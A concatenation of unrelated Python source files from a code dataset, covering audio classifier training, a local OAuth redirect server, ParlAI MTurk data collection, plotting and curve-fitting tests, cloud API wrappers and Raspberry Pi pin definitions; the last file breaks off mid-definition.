fold_dir = ROOT_PATH / "data" / "fold"
img_dir = ROOT_PATH / "image" / IMAGE_VERSION
# train curated
train_curated_df = pd.read_csv(fold_dir / "train_curated_sfk.csv")
train_curated_df = train_curated_df[["fname", "labels", "fold"]]
train_curated_df["fpath"] = str(img_dir.absolute()) + "/train_curated/" + train_curated_df["fname"].str[:-4] + ".png"
# train noisy
# df concat
train_df = train_curated_df
return train_df[["fpath", "labels", "fold"]]
# << data select section
# >> label convert section
@jit("i1[:](i1[:])")
def label_to_array(label):
tag_list = pd.read_csv(ROOT_PATH / "input" / "sample_submission.csv").columns[1:].tolist() # 80 tag list
array = np.zeros(len(tag_list)).astype(int)
for tag in label.split(","):
array[tag_list.index(tag)] = 1
return array
# << label convert section
# >> dataset section
@stop_watch("load train image")
def df_to_labeldata(fpath_arr, labels):
"""
fpath : arr
labels : arr
"""
spec_list = []
label_list = []
@jit
def calc(fpath_arr, labels):
for idx in tqdm(range(len(fpath_arr))):
# melspectrogram
img = Image.open(fpath_arr[idx])
spec_color = np.asarray(img)
spec_list.append(spec_color)
# labels
label_list.append(label_to_array(labels[idx]))
calc(fpath_arr, labels)
return spec_list, label_list
class TrainDataset(Dataset):
"""
train_df :columns=["fpath", "labels"]
"""
def __init__(self, train_path_arr, train_y, transform):
super().__init__()
self.transforms = transform
self.melspectrograms, self.labels = df_to_labeldata(train_path_arr, train_y)
def __len__(self):
return len(self.melspectrograms)
def __getitem__(self, idx):
# crop
image = Image.fromarray(self.melspectrograms[idx], mode="RGB")
time_dim, base_dim = image.size
crop = random.randint(0, time_dim - base_dim)
image = image.crop([crop, 0, crop + base_dim, base_dim])
image = self.transforms(image).div_(255)
label = self.labels[idx]
label = torch.from_numpy(label).float()
return image, label
# << dataset section
# =============== #
# model section #
# =============== #
class ConvBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, 1, 1),
nn.BatchNorm2d(out_channels),
nn.ReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(out_channels, out_channels, 3, 1, 1),
nn.BatchNorm2d(out_channels),
nn.ReLU()
)
self._init_weights()
def _init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.zeros_(m.bias)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = F.avg_pool2d(x, 2)
return x
class Classifier(nn.Module):
def __init__(self, num_classes):
super().__init__()
self.conv = nn.Sequential(
ConvBlock(in_channels=3, out_channels=64),
ConvBlock(in_channels=64, out_channels=128),
ConvBlock(in_channels=128, out_channels=256),
ConvBlock(in_channels=256, out_channels=512),
)
self.fc = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(512, 128),
nn.PReLU(),
nn.BatchNorm1d(128),
nn.Dropout(0.1),
nn.Linear(128, num_classes)
)
def forward(self, x):
x = self.conv(x)
x = torch.mean(x, dim=3)
x, _ = torch.max(x, dim=2)
x = self.fc(x)
return x
# ================ #
# metric section #
# ================ #
# from official code https://colab.research.google.com/drive/1AgPdhSp7ttY18O3fEoHOQKlt_3HJDLi8#scrollTo=cRCaCIb9oguU
@jit
def _one_sample_positive_class_precisions(scores, truth):
"""Calculate precisions for each true class for a single sample.
Args:
scores: np.array of (num_classes,) giving the individual classifier scores.
truth: np.array of (num_classes,) bools indicating which classes are true.
Returns:
pos_class_indices: np.array of indices of the true classes for this sample.
pos_class_precisions: np.array of precisions corresponding to each of those
classes.
"""
num_classes = scores.shape[0]
pos_class_indices = np.flatnonzero(truth > 0)
# Only calculate precisions if there are some true classes.
if not len(pos_class_indices):
return pos_class_indices, np.zeros(0)
# Retrieval list of classes for this sample.
retrieved_classes = np.argsort(scores)[::-1]
# class_rankings[top_scoring_class_index] == 0 etc.
class_rankings = np.zeros(num_classes, dtype=np.int)
class_rankings[retrieved_classes] = range(num_classes)
# Which of these is a true label?
retrieved_class_true = np.zeros(num_classes, dtype=np.bool)
retrieved_class_true[class_rankings[pos_class_indices]] = True
# Num hits for every truncated retrieval list.
retrieved_cumulative_hits = np.cumsum(retrieved_class_true)
# Precision of retrieval list truncated at each hit, in order of pos_labels.
precision_at_hits = (retrieved_cumulative_hits[class_rankings[pos_class_indices]] / (1 + class_rankings[pos_class_indices].astype(np.float)))
return pos_class_indices, precision_at_hits
@jit
def calculate_per_class_lwlrap(truth, scores):
"""Calculate label-weighted label-ranking average precision.
Arguments:
truth: np.array of (num_samples, num_classes) giving boolean ground-truth
of presence of that class in that sample.
scores: np.array of (num_samples, num_classes) giving the classifier-under-
test's real-valued score for each class for each sample.
Returns:
per_class_lwlrap: np.array of (num_classes,) giving the lwlrap for each
class.
weight_per_class: np.array of (num_classes,) giving the prior of each
class within the truth labels. Then the overall unbalanced lwlrap is
simply np.sum(per_class_lwlrap * weight_per_class)
"""
assert truth.shape == scores.shape
num_samples, num_classes = scores.shape
# Space to store a distinct precision value for each class on each sample.
# Only the classes that are true for each sample will be filled in.
precisions_for_samples_by_classes = np.zeros((num_samples, num_classes))
for sample_num in range(num_samples):
pos_class_indices, precision_at_hits = (
_one_sample_positive_class_precisions(scores[sample_num, :],
truth[sample_num, :]))
precisions_for_samples_by_classes[sample_num, pos_class_indices] = (
precision_at_hits)
labels_per_class = np.sum(truth > 0, axis=0)
weight_per_class = labels_per_class / float(np.sum(labels_per_class))
# Form average of each column, i.e. all the precisions assigned to labels in
# a particular class.
per_class_lwlrap = (np.sum(precisions_for_samples_by_classes, axis=0) / np.maximum(1, labels_per_class))
# overall_lwlrap = simple average of all the actual per-class, per-sample precisions
# = np.sum(precisions_for_samples_by_classes) / np.sum(precisions_for_samples_by_classes > 0)
# also = weighted mean of per-class lwlraps, weighted by class label prior across samples
# = np.sum(per_class_lwlrap * weight_per_class)
return per_class_lwlrap, weight_per_class
# =============== #
# train section #
# =============== #
@stop_watch("train section")
def train_model(train_df, train_transforms, fold):
get_logger().info("[start] >> {} fold".format(fold))
num_epochs = 400
batch_size = 64
test_batch_size = 256
lr = 3e-3
eta_min = 1e-5
t_max = 10
num_classes = len(pd.read_csv(ROOT_PATH / "input" / "sample_submission.csv").columns[1:])
trn_data = train_df.query("fold != {}".format(fold))
trn_x = trn_data["fpath"].values
trn_y = trn_data["labels"].values
val_data = train_df.query("fold == {}".format(fold))
val_x = val_data["fpath"].values
val_y = val_data["labels"].values
train_dataset = TrainDataset(trn_x, trn_y, train_transforms)
valid_dataset = TrainDataset(val_x, val_y, train_transforms)
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
valid_loader = DataLoader(valid_dataset, batch_size=test_batch_size, shuffle=False)
model = Classifier(num_classes=num_classes).cuda()
criterion = nn.BCEWithLogitsLoss().cuda()
optimizer = Adam(params=model.parameters(), lr=lr, amsgrad=False)
scheduler = CosineAnnealingLR(optimizer, T_max=t_max, eta_min=eta_min)
best_epoch = -1
best_lwlrap = 0.
mb = master_bar(range(num_epochs))
for epoch in mb:
start = time.time()
# train
model.train()
avg_loss = 0.
for x_batch, y_batch in progress_bar(train_loader, parent=mb):
preds = model(x_batch.cuda())
loss = criterion(preds, y_batch.cuda())
optimizer.zero_grad()
loss.backward()
optimizer.step()
avg_loss += loss.item() / len(train_loader)
# valid
model.eval()
valid_preds = np.zeros((len(val_x), num_classes))
avg_val_loss = 0.
for i, (x_batch, y_batch) in enumerate(valid_loader):
preds = model(x_batch.cuda()).detach()
loss = criterion(preds, y_batch.cuda())
preds = torch.sigmoid(preds)
valid_preds[i * test_batch_size: (i + 1) * test_batch_size] = preds.cpu().numpy()
avg_val_loss += loss.item() / len(valid_loader)
val_labels = np.array([label_to_array(l) for l in val_y.tolist()])
score, weight = calculate_per_class_lwlrap(val_labels, valid_preds)
lwlrap = (score * weight).sum()
scheduler.step()
elapsed = time.time() - start
get_logger(is_torch=True).debug("{}\t{}\t{}\t{}".format(avg_loss, avg_val_loss, lwlrap, elapsed))
if (epoch + 1) % 10 == 0:
mb.write(f"Epoch {epoch + 1} -\tavg_train_loss: {avg_loss:.4f}\tavg_val_loss: {avg_val_loss:.4f}\tval_lwlrap: {lwlrap:.6f}\ttime: {elapsed:.0f}s")
if lwlrap > best_lwlrap:
best_epoch = epoch + 1
best_lwlrap = lwlrap
model_path = "weight_best_{}.pt".format(fold) if IS_KERNEL else (ROOT_PATH / "model" / "{}_weight_best_{}.pt".format(VERSION, fold)).resolve()
torch.save(model.state_dict(), model_path)
get_logger().info("[ end ] >> {} fold".format(fold))
get_logger(is_torch=True).info("")
return {
"best_epoch": best_epoch,
"best_lwlrap": best_lwlrap
}
# ================ #
# logger section #
# ================ #
def create_logger():
# formatter
fmt = Formatter("[%(levelname)s] %(asctime)s >> \t%(message)s")
# stream handler
sh = StreamHandler()
sh.setLevel(INFO)
sh.setFormatter(fmt)
# logger
_logger = getLogger(VERSION)
_logger.setLevel(DEBUG)
_logger.addHandler(sh)
_torch_logger = getLogger("torch" + VERSION)
_torch_logger.setLevel(DEBUG)
_torch_logger.addHandler(sh)
# file output
if not IS_KERNEL:
log_dir = ROOT_PATH / "log"
log_dir.mkdir(exist_ok=True, parents=True)
# file handler
_logfile = log_dir / "{}.log".format(VERSION)
_logfile.touch()
fh = FileHandler(_logfile, mode="w")
fh.setLevel(DEBUG)
fh.setFormatter(fmt)
_logger.addHandler(fh)
_torch_logfile = log_dir / "{}_torch.log".format(VERSION)
_torch_logfile.touch()
torch_fh = FileHandler(_torch_logfile, mode="w")
torch_fh.setLevel(DEBUG)
torch_fh.setFormatter(Formatter("%(message)s"))
_torch_logger.addHandler(torch_fh)
# ===================== #
# pre setting section #
# ===================== #
def seed_everything():
random.seed(SEED)
os.environ["PYTHONHASHSEED"] = str(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
torch.backends.cudnn.daterministic = True
def jobs_manage(n_jobs=cpu_count()):
os.environ["MKL_NUM_THREADS"] = str(n_jobs)
os.environ["OMP_NUM_THREADS"] = str(n_jobs)
# ============== #
# main section #
# ============== #
@stop_watch("main function")
def main():
# presetting
seed_everything()
jobs_manage()
train_df = select_train_data()
train_transforms = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor()
])
lwlrap_result = 0
for i in range(FOLD_NUM):
result = train_model(train_df, train_transforms, i)
get_logger().info("[fold {}]best_epoch : {},\tbest_lwlrap : {}".format(i, result["best_epoch"], result["best_lwlrap"]))
lwlrap_result += result["best_lwlrap"] / FOLD_NUM
get_logger().info("[result]best_lwlrap : {}".format(lwlrap_result))
if __name__ == "__main__":
gc.enable()
create_logger()
try:
main()
except Exception as e:
get_logger().error("Exception Occured. \n>> \n {}".format(e))
raise e
| StarcoderdataPython |
4850886 | from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
AUTHORIZATION_CODE = None
class TerminateHTTPServer(Exception):
"""
Custom exception class that can stop the event loop
so that we can gracefully terminate the http server
"""
# I've spent a good hour trying to figure out why I'm not
# able to handle this exception in run method.
# For now, I'll raise KeyboardInterrupt but need to investigate
# this further
def __init__(self):
raise KeyboardInterrupt
class WebServer(BaseHTTPRequestHandler):
def _set_response(self, code):
self.send_response(code)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
global AUTHORIZATION_CODE
parsed_url = urlparse(self.path)
query_params = parse_qs(parsed_url.query)
AUTHORIZATION_CODE = query_params.get("code", None)
self._set_response(code=200)
if AUTHORIZATION_CODE:
self.wfile.write(f"Authentication Successful. You can close this tab now".encode('utf-8'))
raise TerminateHTTPServer
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
self.send_error(405)
def get_authorization_code(server_class=HTTPServer, handler_class=WebServer, port=8239):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
return AUTHORIZATION_CODE[0]
| StarcoderdataPython |
193112 | <reponame>takatoy/ParlAI
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.tasks.image_chat.agents import ImageChatTeacher
from worlds import (
MTurkImageChatWorld,
RoleOnboardWorld,
PersonalityGenerator,
ExampleGenerator,
RESPONDER,
)
from task_configs.task_config_first_response import task_config as config_first
from task_configs.task_config_second_response import task_config as config_second
import os
def main():
"""
Image Chat data collection task.
A worker is shown an image and part of a conversation, and is given a personality
with which the worker should continue the conversation.
"""
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
argparser.add_argument(
'-min_t', '--min_turns', default=3, type=int, help='minimum number of turns'
)
argparser.add_argument(
'-mt', '--max_turns', default=5, type=int, help='maximal number of chat turns'
)
argparser.add_argument(
'-mx_rsp_time',
'--max_resp_time',
default=1800,
type=int,
help='time limit for entering a dialog message',
)
argparser.add_argument(
'-mx_onb_time',
'--max_onboard_time',
type=int,
default=300,
help='time limit for turker' 'in onboarding',
)
argparser.add_argument(
'-ni',
'--num_images',
type=int,
default=10,
help='number of images to show \
to turker',
)
argparser.add_argument(
'--auto-approve-delay',
type=int,
default=3600 * 24 * 5,
help='how long to wait for \
auto approval',
)
argparser.add_argument(
'--second-response',
type='bool',
default=False,
help='Specify if getting responses \
to responses to original comment',
)
ImageChatTeacher.add_cmdline_args(argparser)
opt = argparser.parse_args()
directory_path = os.path.dirname(os.path.abspath(__file__))
opt['task'] = os.path.basename(directory_path)
if 'data_path' not in opt:
opt['data_path'] = os.getcwd() + '/data/' + opt['task']
opt.update(config_second if opt['second_response'] else config_first)
mturk_agent_ids = [RESPONDER]
mturk_manager = MTurkManager(opt=opt, mturk_agent_ids=mturk_agent_ids)
personality_generator = PersonalityGenerator(opt)
example_generator = ExampleGenerator(opt)
mturk_manager.setup_server(task_directory_path=directory_path)
try:
mturk_manager.start_new_run()
mturk_manager.ready_to_accept_workers()
def run_onboard(worker):
worker.personality_generator = personality_generator
worker.example_generator = example_generator
world = RoleOnboardWorld(opt, worker)
world.parley()
world.shutdown()
mturk_manager.set_onboard_function(onboard_function=run_onboard)
mturk_manager.create_hits()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for w in workers:
w.id = mturk_agent_ids[0]
def run_conversation(mturk_manager, opt, workers):
agents = workers[:]
conv_idx = mturk_manager.conversation_index
world = MTurkImageChatWorld(
opt, agents=agents, world_tag='conversation t_{}'.format(conv_idx)
)
while not world.episode_done():
world.parley()
world.save_data()
world.shutdown()
world.review_work()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation,
)
except BaseException:
raise
finally:
mturk_manager.expire_all_unassigned_hits()
mturk_manager.shutdown()
if __name__ == '__main__':
main()
| StarcoderdataPython |
9683605 | <filename>videoframe.py
import cv2
def saveFramestoImages(videopath,outdirName):
vidcap = cv2.VideoCapture(videopath)
success,image = vidcap.read()
count = 0
success = True
while success:
cv2.imwrite("{}/frame{}.jpg".format(outdirName, count), image) # save frame as JPEG file
success,image = vidcap.read()
print 'Read a new frame: ', success
count += 1
saveFramestoImages('assets/cspan.mp4','frames')
saveFramestoImages('assets/sarah.mp4','framessarah') | StarcoderdataPython |
1640975 | <filename>gpfit/tests/test_evaluate.py<gh_stars>1-10
"Test evaluate methods"
import unittest
from numpy import arange, newaxis
from gpfit.fit import MaxAffine, SoftmaxAffine, ImplicitSoftmaxAffine
class TestMaxAffine(unittest.TestCase):
"Test max_affine"
x = arange(0.0, 16.0)[:, newaxis]
ba = arange(1.0, 7.0).reshape(2, 3)
y, dydba = MaxAffine.evaluate(x, ba)
def test_y_size(self):
self.assertEqual(self.y.size, self.x.size)
def test_y_ndim(self):
self.assertEqual(self.y.ndim, 1)
def test_dydba_shape(self):
self.assertEqual(self.dydba.shape, (self.x.size, self.ba.size))
def test_dydba_ndim(self):
self.assertEqual(self.dydba.ndim, 2)
class TestSoftmaxAffine(unittest.TestCase):
"Tests softmax_affine"
x = arange(0.0, 16.0)[:, newaxis]
params = arange(1.0, 6.0)
y, dydp = SoftmaxAffine.evaluate(x, params)
def test_y_size(self):
self.assertEqual(self.y.size, self.x.size)
def test_y_ndim(self):
self.assertEqual(self.y.ndim, 1)
def test_dydp_shape(self):
self.assertEqual(self.dydp.shape, (self.x.size, self.params.size))
def test_dydp_ndim(self):
self.assertEqual(self.dydp.ndim, 2)
class TestImplicitSoftmaxAffine(unittest.TestCase):
"Tests implicit_softmax_affine"
x = arange(0.0, 16.0)[:, newaxis]
params = arange(1.0, 7.0)
y, dydp = ImplicitSoftmaxAffine.evaluate(x, params)
def test_y_size(self):
self.assertEqual(self.y.size, self.x.size)
def test_y_ndim(self):
self.assertEqual(self.y.ndim, 1)
def test_dydp_shape(self):
self.assertEqual(self.dydp.shape, (self.x.size, self.params.size))
def test_dydp_ndim(self):
self.assertEqual(self.dydp.ndim, 2)
TESTS = [
TestMaxAffine,
TestSoftmaxAffine,
TestImplicitSoftmaxAffine,
]
if __name__ == "__main__":
SUITE = unittest.TestSuite()
LOADER = unittest.TestLoader()
for t in TESTS:
SUITE.addTests(LOADER.loadTestsFromTestCase(t))
unittest.TextTestRunner(verbosity=2).run(SUITE)
| StarcoderdataPython |
6546650 | # -*- coding: utf-8 -*-
###############################################################################
#
# WriteLocationData
# Allows you to easily update the location data of your feed.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class WriteLocationData(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the WriteLocationData Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(WriteLocationData, self).__init__(temboo_session, '/Library/Xively/ReadWriteData/WriteLocationData')
def new_input_set(self):
return WriteLocationDataInputSet()
def _make_result_set(self, result, path):
return WriteLocationDataResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return WriteLocationDataChoreographyExecution(session, exec_id, path)
class WriteLocationDataInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the WriteLocationData
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Xively.)
"""
super(WriteLocationDataInputSet, self)._set_input('APIKey', value)
def set_Disposition(self, value):
"""
Set the value of the Disposition input for this Choreo. ((optional, string) Can be set to "mobile" to enable creating waypoints (lat, lon and elevation with timestamp), or "fixed" (default) for a single location. Leave empty to keep existing settings.)
"""
super(WriteLocationDataInputSet, self)._set_input('Disposition', value)
def set_Domain(self, value):
"""
Set the value of the Domain input for this Choreo. ((optional, string) The domain of the location, i.e. physical or virtual. Leave empty to keep existing Domain. Type "BLANK" to clear existing Domain. Ex: "physical".)
"""
super(WriteLocationDataInputSet, self)._set_input('Domain', value)
def set_Elevation(self, value):
"""
Set the value of the Elevation input for this Choreo. ((optional, decimal) Elevation in meters. Leave empty to keep previously existing Elevation. Type "BLANK" to clear existing Elevation. Ex: 20.5.)
"""
super(WriteLocationDataInputSet, self)._set_input('Elevation', value)
def set_FeedID(self, value):
"""
Set the value of the FeedID input for this Choreo. ((required, integer) The ID for the feed that you would like to update.)
"""
super(WriteLocationDataInputSet, self)._set_input('FeedID', value)
def set_Latitude(self, value):
"""
Set the value of the Latitude input for this Choreo. ((optional, decimal) Latitude coordinates. Leave empty to keep previously existing Latitude. Type "BLANK" to clear existing Latitude. Ex: 40.728194.)
"""
super(WriteLocationDataInputSet, self)._set_input('Latitude', value)
def set_Longitude(self, value):
"""
Set the value of the Longitude input for this Choreo. ((optional, decimal) Longitude coordinates. Leave empty to keep previously existing Location. Type "BLANK" to clear existing settings. Ex: -73.957316.)
"""
super(WriteLocationDataInputSet, self)._set_input('Longitude', value)
def set_Name(self, value):
"""
Set the value of the Name input for this Choreo. ((optional, string) Name of Location. Leave empty to keep existing Location. Type "BLANK" to clear existing settings. Ex.: "My Fitbit Tracker".)
"""
super(WriteLocationDataInputSet, self)._set_input('Name', value)
class WriteLocationDataResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the WriteLocationData Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_ResponseStatusCode(self):
"""
Retrieve the value for the "ResponseStatusCode" output from this Choreo execution. ((integer) The response status code returned from Xively. For a successful feed location update, the code should be 200.)
"""
return self._output.get('ResponseStatusCode', None)
class WriteLocationDataChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return WriteLocationDataResultSet(response, path)
| StarcoderdataPython |
9786894 | # Copyright 2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import urllib
from requestbuilder import Arg, MutuallyExclusiveArgList
from euca2ools.commands.argtypes import file_contents
from euca2ools.commands.iam import IAMRequest, AS_ACCOUNT
class CreateRole(IAMRequest):
DESCRIPTION = 'Create a new role'
ARGS = [Arg('-r', '--role-name', dest='RoleName', metavar='ROLE',
required=True, help='name of the new role (required)'),
Arg('-p', '--path', dest='Path',
help='path for the new role (default: "/")'),
MutuallyExclusiveArgList(
Arg('-f', dest='AssumeRolePolicyDocument', metavar='FILE',
type=file_contents,
help='file containing the policy for the new role'),
Arg('-s', '--service_', route_to=None, help='''service to allow
access to the role (e.g. ec2.amazonaws.com)'''))
.required(),
Arg('-v', '--verbose', action='store_true', route_to=None,
help="print the new role's ARN, GUID, and policy"),
AS_ACCOUNT]
def preprocess(self):
if self.args.get('service_'):
statement = {'Effect': 'Allow',
'Principal': {'Service': [self.args['service_']]},
'Action': ['sts:AssumeRole']}
policy = {'Version': '2008-10-17',
'Statement': [statement]}
self.params['AssumeRolePolicyDocument'] = json.dumps(policy)
def print_result(self, result):
if self.args.get('verbose'):
print result.get('Role', {}).get('Arn')
print result.get('Role', {}).get('RoleId')
print urllib.unquote(result.get('Role', {})
.get('AssumeRolePolicyDocument'))
| StarcoderdataPython |
68254 | <filename>test/gui/mpl_figuremaker.py
"""A set of simple tests of the MPL FigureMaker classes."""
import numpy as np
from plottr import QtWidgets
from plottr.plot.base import ComplexRepresentation
from plottr.plot.mpl.autoplot import FigureMaker, PlotType
from plottr.plot.mpl.widgets import figureDialog
def test_multiple_line_plots(single_panel: bool = False):
"""plot a few 1d traces."""
fig, win = figureDialog()
setpts = np.linspace(0, 10, 101)
data_1 = np.cos(setpts)
with FigureMaker(fig) as fm:
fm.plotType = PlotType.multitraces if single_panel else PlotType.singletraces
line_1 = fm.addData(setpts, data_1, labels=['x', r'$\cos(x)$'])
_ = fm.addData(setpts, data_1 ** 2, labels=['x', r'$\cos^2(x)$'])
_ = fm.addData(setpts, data_1 ** 3, labels=['x', r'$\cos^3(x)$'])
return win
def test_complex_line_plots(single_panel: bool = False,
mag_and_phase_format: bool = False):
"""Plot a couple of complex traces"""
fig, win = figureDialog()
setpts = np.linspace(0, 10, 101)
data_1 = np.exp(-1j * setpts)
data_2 = np.conjugate(data_1)
with FigureMaker(fig) as fm:
if mag_and_phase_format:
fm.complexRepresentation = ComplexRepresentation.magAndPhase
fm.plotType = PlotType.multitraces if single_panel else PlotType.singletraces
line_1 = fm.addData(setpts, data_1, labels=['x', r'$\exp(-ix)$'])
_ = fm.addData(setpts, data_2, labels=['x', r'$\exp(ix)$'])
return win
def main():
app = QtWidgets.QApplication([])
wins = []
wins.append(
test_multiple_line_plots())
wins.append(
test_multiple_line_plots(single_panel=True))
# wins.append(
# test_complex_line_plots())
# wins.append(
# test_complex_line_plots(single_panel=True))
# wins.append(
# test_complex_line_plots(mag_and_phase_format=True))
wins.append(
test_complex_line_plots(single_panel=True, mag_and_phase_format=True))
for w in wins:
w.show()
return app.exec_()
if __name__ == '__main__':
main()
| StarcoderdataPython |
189624 | from collections import namedtuple
from itertools import chain
class RowNames:
OUTER="outer"
INNER="inner"
class PinTypes:
GPIO="gpio"
POWER_5V="5V+"
POWER_3V3="3V3+"
GND="GND"
I2C="i2c"
EEPROM="EEPROM"
Pin = namedtuple("Pin", "coords, id, pin_type, special_func")
PinCoords = namedtuple("PinCoords", "row_name, pin_pair_num")
Row = namedtuple("Row", "row_name, pins")
Column = namedtuple("Column", "column_num, outer_pin, inner_pin")
class RPi3Pins:
def __init__(self):
pass
@staticmethod
def get_pins_by_type(pin_type):
query_results = []
for entry in chain.from_iterable([
RPi3Pins.outer_row().pins,
RPi3Pins.inner_row().pins
]):
if entry.pin_type == pin_type:
query_results.append(entry)
return query_results
@staticmethod
def get_pin_at(inner_or_outer, pair_index):
if inner_or_outer == RowNames.OUTER:
return RPi3Pins.outer_row().pins[pair_index]
if inner_or_outer == RowNames.INNER:
return RPi3Pins.inner_row().pins[pair_index]
@staticmethod
def outer_row():
return Row(row_name=RowNames.OUTER, pins=[
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=0),
id=None,
pin_type=PinTypes.POWER_5V,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=1),
id=None,
pin_type=PinTypes.POWER_5V,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=2),
id=None,
pin_type=PinTypes.GND,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=3),
id=14,
pin_type=PinTypes.GPIO,
special_func="TXD0"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=4),
id=15,
pin_type=PinTypes.GPIO,
special_func="RXD0"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=5),
id=18,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN_1"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=6),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=7),
id=23,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN_4"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=8),
id=24,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN_5"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=9),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=10),
id=25,
pin_type=PinTypes.GPIO,
special_func="GPIO_GEN_6"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=11),
id=8,
pin_type=PinTypes.GPIO,
special_func="SPI_CE0_N"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=12),
id=7,
pin_type=PinTypes.GPIO,
special_func="SPI_CE1_N"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=13),
id=0,
pin_type=PinTypes.EEPROM,
special_func="I2C EEPROM ID_SC"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=14),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=15),
id=12,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=16),
id=None,
pin_type=PinTypes.GND,
special_func="GND"
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=17),
id=16,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=18),
id=20,
pin_type=PinTypes.GPIO,
special_func=None
),
Pin(
coords=PinCoords(row_name=RowNames.OUTER, pin_pair_num=19),
id=21,
